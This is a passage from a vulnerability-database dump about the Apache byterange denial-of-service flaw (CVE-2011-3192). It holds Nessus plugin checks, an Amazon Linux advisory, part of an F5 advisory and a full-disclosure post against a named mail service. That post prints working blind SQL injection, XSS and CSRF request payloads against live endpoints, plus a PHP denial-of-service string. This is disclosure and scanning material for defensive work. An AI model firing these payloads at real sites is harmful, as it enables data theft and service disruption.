Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.4\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-2.2.17-4.7.1\") ) 
flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-debugsource-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-devel-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-certificates-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-example-pages-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-itk-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-prefork-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-utils-debuginfo-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-2.2.17-4.7.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.4\", reference:\"apache2-worker-debuginfo-2.2.17-4.7.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-01T02:13:51", "bulletinFamily": "scanner", "description": "The MITRE CVE database describes CVE-2011-3192 as :\n\nThe byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial of service (memory and CPU consumption) via a Range header that\nexpresses multiple overlapping ranges, as 
exploited in the wild in\nAugust 2011, a different vulnerability than CVE-2007-0086.", "modified": "2019-11-02T00:00:00", "id": "ALA_ALAS-2011-01.NASL", "href": "https://www.tenable.com/plugins/nessus/69560", "published": "2013-09-04T00:00:00", "title": "Amazon Linux AMI : httpd (ALAS-2011-01)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2011-01.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69560);\n script_version(\"$Revision: 1.9 $\");\n script_cvs_date(\"$Date: 2015/01/30 14:43:52 $\");\n\n script_cve_id(\"CVE-2011-3192\");\n script_xref(name:\"ALAS\", value:\"2011-01\");\n script_xref(name:\"RHSA\", value:\"2011:1245\");\n\n script_name(english:\"Amazon Linux AMI : httpd (ALAS-2011-01)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The MITRE CVE database describes CVE-2011-3192 as :\n\nThe byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through\n2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a\ndenial of service (memory and CPU consumption) via a Range header that\nexpresses multiple overlapping ranges, as exploited in the wild in\nAugust 2011, a different vulnerability than CVE-2007-0086.\"\n );\n # http://lists.opensuse.org/opensuse-security-announce/2011-09/msg00006.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4868d419\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.ubuntu.com/usn/USN-1199-1/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2011-1.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n 
value:\n\"Run 'yum upgrade httpd' to upgrade your system. Then run 'service\nhttpd restart' to restart the Apache HTTP Server.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/AmazonLinux/release\")) audit(AUDIT_OS_NOT, \"Amazon Linux AMI\");\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"httpd-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-debuginfo-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-devel-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-manual-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"httpd-tools-2.2.21-1.18.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"mod_ssl-2.2.21-1.18.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "amazon": [{"lastseen": "2019-05-29T17:22:27", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nThe Apache HTTP Server is a popular web server.\n\nA flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. ([CVE-2011-3192 __](<https://access.redhat.com/security/cve/CVE-2011-3192>))\n\nAll httpd users should upgrade to these updated packages, which contain a backported patch to correct this issue. 
After installing the updated packages, the httpd daemon must be restarted for the update to take effect.\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-devel-2.2.21-1.18.amzn1.i686 \n httpd-debuginfo-2.2.21-1.18.amzn1.i686 \n httpd-2.2.21-1.18.amzn1.i686 \n httpd-tools-2.2.21-1.18.amzn1.i686 \n mod_ssl-2.2.21-1.18.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.21-1.18.amzn1.noarch \n \n src: \n httpd-2.2.21-1.18.amzn1.src \n \n x86_64: \n mod_ssl-2.2.21-1.18.amzn1.x86_64 \n httpd-tools-2.2.21-1.18.amzn1.x86_64 \n httpd-2.2.21-1.18.amzn1.x86_64 \n httpd-devel-2.2.21-1.18.amzn1.x86_64 \n httpd-debuginfo-2.2.21-1.18.amzn1.x86_64 \n \n \n", "modified": "2014-09-14T14:25:00", "published": "2014-09-14T14:25:00", "id": "ALAS-2011-001", "href": "https://alas.aws.amazon.com/ALAS-2011-1.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:40", "bulletinFamily": "exploit", "description": "", "modified": "2013-10-07T00:00:00", "published": "2013-10-07T00:00:00", "href": "https://packetstormsecurity.com/files/123527/Opolis.eu-Secure-Mail-Blind-SQL-Injection-XSS-CSRF-DoS.html", "id": "PACKETSTORM:123527", "type": "packetstorm", "title": "Opolis.eu Secure Mail Blind SQL Injection / XSS / CSRF / DoS", "sourceData": "`========================================================================================================================================================================= \nOPOLIS.EU SECURE MAIL Blind SQLInjection / Cross site scripting / CSRF / Apacche httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/User credentials are sent in clear text 
\n========================================================================================================================================================================== \n \nTIME-LINE VULNERABILITY \n \nMultiples Advisories \n \nOpolis Secure IT-Services GmbH \n \nAddress:Romberggasse 3 \n1230 Vienna \nAustria \nE-Mail Contact: helpdesk@opolis.eu<helpdesk@opolis.eu> \n \nBUT \n \nNot Response \n \nTHEN \n \nFull Disclosure \n \n \nI. VULNERABILITY \n------------------------- \n#Title: OPOLIS.EU SECURE MAIL BLIND SQLInjection / Cross site scripting /Cross Site Request Forgery/ Apache httpd Remote D.O.S /PHP hangs on parsing particular strings as floating point number/ Credentials are sent in clear text \n \n#Vendor:http://www.opolis.eu/ \n \n#Author:Juan Carlos Garc\u00eda (@secnight) \n \n#Follow me \nTwitter:@secnight \n \nII. DESCRIPTION \n------------------------- \nOpolis Secure Mail is dedicated to provide the most user-friendly high-security E-Mail and document messaging service. \nOpolis re-defines E-Mail with its \u201cPower to the Sender\u201d philosophy: The sender decides if or how E-Mails may be further \nprocessed and the sender monitors the processing and forwarding flow of messages. Opolis also offers co-branded solutions \nfor internet and E-Mail communication as well as document messaging. Opolis Secure Mail is owned by privately-held PI Technology Co WLL. \n \nIII. PROOF OF CONCEPT \n------------------------- \n \nBlind SQL Injection \n******************** \n \nVulnerability description \n------------------------- \n \nSQL injection is a vulnerability that allows an attacker to alter back-end SQL statements by manipulating the user input. An SQL injection occurs when web applications accept user input that is directly placed into a SQL statement and \n \ndoesn't properly filter out dangerous characters. \n \nThis is one of the most common application layer attacks currently being used on the Internet. 
Despite the fact that it is relatively easy to protect against, there is a large number of web applications vulnerable. \n \nAffected items \n---------------- \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep5.php \n \n \nURL encoded POST input checkedemail was set to 1';select pg_sleep(2); -- \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep5.php \n \naiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=NIL&aifirstname=myufyvmc&ailanguage=English&ailastname=myufyvmc&aititle=Mr.&aizip=94102&checkedemail=1%27%3bselect \n \n%20pg_sleep%282%29%3b%20--%20&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=myufyvmc \n \n \n \n/slimstat/stats_js.php \n \n\"ttl\" \n \nURL encoded GET input \"ttl\" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK \n \n(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR\"*/ \n \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version \n \n%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR%28%40%40version \n \n%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*% \n \n \n\"url\" \n \nURL 
encoded GET input \"url\" was set to IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR'|\"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK \n \n(2000000,SHA1(0xDEADBEEF)),SLEEP(3)))OR\"*/ \n \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR \n \n%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f \n \n \nGET /slimstat/stats_js.php?ref=&res=1920x1080&ts=1381056265&ttl=O!polis%20Secure%20Mail%20Service&url=IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%2f*%27XOR%28IF%28SUBSTR \n \n%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%27%7c%22XOR%28IF%28SUBSTR%28%40%40version%2c1%2c1%29%3c5%2cBENCHMARK%282000000%2cSHA1%280xDEADBEEF%29%29%2cSLEEP%283%29%29%29OR%22*%2f \n \n \nCross site scripting ( 67 ) \n********************* \n \nCross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious \ncode (usually in the form of Javascript) to another user. Because a browser cannot know if the script should be \ntrusted or not, it will execute the script in the user context allowing the attacker to access any cookies \nor session tokens retained by the browser. 
\n \nAffected items \n---------------- \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php (2) \n \nURL encoded POST input OSMLogInNam was set to hkmohkhr_974672\"():;934304 \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep1.php \n \ncheckloginname=&OSMLogInNam=hkmohkhr_974672%22%28%29%3a%3b934304 \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (2) \n \nURL encoded POST input currentEmail was set to sample%40email.tst_940309\"():;974560 \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncurrentEmail=sample%2540email.tst_940309%22%28%29%3a%3b974560&showcheckedloginname=rgrdtkbl \n \n \n \n/OpolisSignUp/OpolisSignUpStep1a.php (2) \n \nURL encoded POST input OSMLogInNam was set to etomstqd_911786\"():;974637 \n \nPOST /OpolisSignUp/OpolisSignUpStep1a.php \n \ncheckloginname=&OSMLogInNam=etomstqd_911786%22%28%29%3a%3b974637 \n \n \n \n \n/OpolisSignUp/OpolisSignUpStep2a.php \n \nURL encoded POST input currentEmail was set to sample%40email.tst_928249\"():;986211 \n \nThe input is reflected inside <script> tag between double quotes. \n \n \n \nPOST /OpolisSignUp/OpolisSignUpStep2a.php \n \n \ncurrentEmail=sample%2540email.tst_928249%22%28%29%3a%3b986211&showcheckedloginname=vethpimh \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php. (3) \n \nURL encoded POST input checkedloginname was set to 1\" onmouseover=prompt(939864) bad=\" \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncheckedloginname=1%22%20onmouseover%3dprompt%28939864%29%20bad%3d%22&showEmailfield= \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep3.php. (5) \n \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(911118) bad=\" \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep3.php \n \ncheckedemail=1%22%20onmouseover%3dprompt%28911118%29%20bad%3d%22&checkedloginname=&showverifyEmailfield \n \n \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep4.php. 
(5) \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(967963) bad=\" \n \ncheckedemail=1%22%20onmouseover%3dprompt%28967963%29%20bad%3d%22&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=juvgwacr&verifycurrentEmail=sample%40email.tst \n \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep5.php. (52) \n \nURL encoded POST input aicountry was set to Antarctica'\"()&%<ScRiPt >prompt(973546)</ScRiPt> \n \naiacademic=1&aiaddressline1=3137%20Laguna%20Street&aiaddressline2=3137%20Laguna%20Street&aicity=San%20Francisco&aicountry=Antarctica%27%22%28%29%26%25%3cScRiPt%20%3eprompt%28973546%29%3c%2fScRiPt \n \n%3e&aifirstname=kmaqpmwp&ailanguage=English&ailastname=kmaqpmwp&aititle=Mr.&aizip=94102&checkedemail=&checkedloginname=&createcodes=&showcheckedemail=sample%40email.tst&showcheckedloginname=kmaqpmwp \n \n \n \n \n/OpolisSignUp/OpolisSignUpStep2a.php. (3) \n \nURL encoded POST input checkedloginname was set to 1\" onmouseover=prompt(994853) bad=\" \n \ncheckedloginname=1%22%20onmouseover%3dprompt%28994853%29%20bad%3d%22&showEmailfield= \n \n \n/OpolisSignUp/OpolisSignUpStep3a.php. (5) \n \nURL encoded POST input checkedemail was set to 1\" onmouseover=prompt(935016) bad=\" \n \ncheckedemail=1%22%20onmouseover%3dprompt%28935016%29%20bad%3d%22&checkedloginname=&showverifyEmailfield= \n \n \nCross Site Request Forgery CSRF (12) \n******************************* \n \nCross-site request forgery, also known as a one-click attack or session riding and abbreviated as CSRF or XSRF, \nis a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. 
\n \n \nAffected items \n--------------- \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0) \n/createOpolisWorkGroup/createOpolisWorkGroupStep3.php \n/createOpolisWorkGroup/createOpolisWorkGroupStep4.php (32e4ce87958c47459e9174f94651b76d) \n/OpolisSignUp/OpolisSignUpStep1a.php \n/OpolisSignUp/OpolisSignUpStep2a.php (f3d86faf83a15fd403feae569c201ee0) \n/OpolisSignUp/OpolisSignUpStep3a.php \n/slimstat (9200b13decfada22b75676834e865e65) \n \nThe impact of this vulnerability \n--------------------------------- \n \nAn attacker may force the users of a web application to execute actions of the attacker's choosing. \nA successful CSRF exploit can compromise end user data and operation in case of normal user. \nIf the targeted end user is the administrator account, this can compromise the entire web application. \n \n \nTwo examples ( too much security flaws .. ) \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep1.php. (2) \n \nAttack details \n---------------- \nForm name: OSMSignUp \nForm action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep1.php \nForm method: POST \n \nForm inputs: \n \ncheckloginname [Hidden] \nOSMLogInNam [Text] \n \n \n/createOpolisWorkGroup/createOpolisWorkGroupStep2.php (f3d86faf83a15fd403feae569c201ee0). 
\n \nAttack details \n----------------- \nForm name: OSMSignUp \nForm action: http://www.opolis.eu/createOpolisWorkGroup/createOpolisWorkGroupStep2.php \nForm method: POST \n \nForm inputs: \n \nshowcheckedloginname [Text] \ncurrentEmail [Text] \n \nPOST /createOpolisWorkGroup/createOpolisWorkGroupStep2.php \n \ncheckedloginname=&showEmailfield= \n \n \n \nApache httpd Remote D.O.S (2) \n************************** \n \nVulnerability description \n------------------------------- \nA denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server: \n \nhttp://seclists.org/fulldisclosure/2011/Aug/175 \n \nAn attack tool is circulating in the wild. Active use of this tools has been observed. \n \nThe attack can be done remotely and with a modest number of requests can cause very significant memory and CPU usage on the server. \n \n \nAffected Apache versions (1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19). \n \n \nHow to fix this vulnerability \n---------------------------- \nUpgrade to the latest version of Apache HTTP Server (2.2.20 or later), available from the Apache HTTP Server Project Web site. \n \nWeb references \n-------------- \nCVE-2011-3192 \nApache HTTPD Security ADVISORY \nApache HTTP Server 2.2.20 Released \nApache httpd Remote Denial of Service (memory exhaustion) \n \n \nApache httpOnly cookie disclosure \n********************************** \n \nVulnerability description \n---------------------------- \nApache HTTP Server 2.2.x through 2.2.21 does not properly restrict header information during construction of Bad Request (aka 400) error documents, which allows remote attackers to obtain the values of HTTPOnly cookies via vectors \n \ninvolving a (1) long or (2) malformed header in conjunction with crafted web script. \n \nAffected Apache versions (up to 2.0.21). \n \nThe impact of this vulnerability \n------------------------------- \nInformation disclosure. 
\n \nHow to fix this vulnerability \n------------------------------ \nUpgrade Apache 2.x to the latest version. Apache 2.2.22 is the first version that fixed this issue. \n \nWeb references \n--------------- \nFixed in Apache httpd 2.2.22 \nApache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability \n \n \n \nPHP hangs on parsing particular strings as floating point number (2) \n***************************************************************** \n \nPHP hangs when parsing '2.2250738585072011e-308' string as a floating point number. \n \nCurrent version is : PHP/5.3.1 \n \nAffected PHP versions: 5.3 up to version 5.3.5 and 5.2 up to version 5.2.17 \n \nAffected items \n--------------- \nWeb Server \n \nThe impact of this vulnerability \n---------------------------------- \nDenial of service attack \n \nHow to fix this vulnerability \n------------------------------- \nUpgrade PHP to the latest version. \n \nWeb references \n----------------- \nPHP Hangs On Numeric Value 2.2250738585072011e-308 \nPHP Homepage \n \n \nUser credentials are sent in clear text \n***************************************** \n \nVulnerability description \n--------------------------- \nUser credentials are transmitted over an unencrypted channel. \nThis information should always be transferred via an encrypted channel (HTTPS) to avoid being intercepted by malicious users. \n \nAffected items \n-------------- \n/slimstat (9200b13decfada22b75676834e865e65) \n \nThe impact of this vulnerability \n---------------------------------- \nA third party may be able to read the user credentials by intercepting an unencrypted HTTP connection. \n \nHow to fix this vulnerability \n------------------------------- \nBecause user credentials are considered sensitive information, should always be transferred to the server over an encrypted connection (HTTPS). \n \n \nIV. BUSINESS IMPACT \n------------------------- \n \n( No Comments... 
) \n \nV SOLUTION \n------------------------ \n \nVery easy and I don\u00b4t understand... WRITE SECURE CODE P L E A S E !! \n \n \nVI. CREDITS \n------------------------- \n \nThis vulnerability has been discovered \nby Juan Carlos Garc\u00eda(@secnight) \n \n \nVII. LEGAL NOTICES \n------------------------- \n \nThe Author accepts no responsibility for any damage \ncaused by the use or misuse of this information. \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123527/opolisdoteu-sqlxssxsrfdos.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "f5": [{"lastseen": "2019-12-09T23:27:19", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 366505 (BIG-IP and Enterprise Manager) and ID 366621 (ARX) to this vulnerability. To determine if your release is known to be vulnerable, and for information about releases or hotfixes that resolve the vulnerability, refer to the following table:\n\nProduct | Versions known to be Vulnerable | Versions known to be Not Vulnerable | Vulnerable component or feature \n---|---|---|--- \nBIG-IP LTM | 9.0.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 \n| 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP GTM | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \nBIG-IP ASM | 9.2.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP Link Controller | 9.2.2 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 \n| 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers 
\nBIG-IP WebAccelerator | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP PSM | 9.4.0 - 9.4.8 \n10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP WOM | 10.0.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP APM | 10.1.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP Edge Gateway \n| 10.1.0 - 10.2.2 \n11.0.0 | 10.2.2-HF3 \n10.2.3 and later \n11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nVirtual servers are not vulnerable, but may proxy exploits to vulnerable servers \nBIG-IP Analytics \n| 11.0.0 | 11.0.0-HF1 \n11.1.0 and later \n| Configuration utility \n \nBIG-IP AFM | None | 11.3.0 and later | None \nBIG-IP PEM \n| None | 11.3.0 and later | None \nBIG-IP AAM | None | 11.4.0 and later | None \nFirePass | None | 6.x \n7.x | None \nEnterprise Manager | 1.7.0 - 1.8.0 \n2.0.0 - 2.2.0 \n| 2.3.0 and later \n3.x \n| Configuration utility \n \nARX | 5.0.0 - 5.3.1 \n6.0.0 - 6.1.1 | 6.2.0 and later \n| API (disabled by default) \n\n\n * [BIG-IP 11.x](<https://support.f5.com/csp/article/K13114#11.x>)\n * [BIG-IP 10.1.0 through 10.2.2](<https://support.f5.com/csp/article/K13114#10.1.0>)\n * [BIG-IP 9.4.2 through 10.0.1](<https://support.f5.com/csp/article/K13114#9.4.2>)\n * [BIG-IP 9.0.0 through 9.4.1](<https://support.f5.com/csp/article/K13114#9.0.0>)\n * [Configure BIG-IP virtual servers 